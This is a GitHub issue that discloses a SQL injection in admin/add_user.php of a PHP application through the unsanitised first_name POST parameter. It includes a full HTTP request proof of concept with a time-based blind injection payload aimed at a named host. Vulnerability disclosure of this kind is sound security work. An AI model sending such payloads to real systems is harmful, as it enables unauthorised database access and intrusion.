You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
admin/add_user.php from line 7,The $first_name parameter is controllable, the parameter first_name can be passed through post, and the $first_name is not protected from sql injection, resulting in sql injection
POST /admin/add_user.php HTTP/1.1Host: www.onsp.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 89Origin: http://www.onsp.netConnection: closeReferer: http://www.onsp.net/admin/add_user.phpCookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25Upgrade-Insecure-Requests: 1first_name=1'+(SELECT 0x6e504162 WHERE 1952=1952 AND (SELECT 6458 FROM (SELECT(SLEEP(5)))rFne))+'&last_name=1&email=1&user_password=1&mobile=1&address1=1&address2=1&btn_save=
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
admin/add_user.php
from line 7,The $first_name parameter is controllable, the parameter first_name can be passed through post, and the $first_name is not protected from sql injection, resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: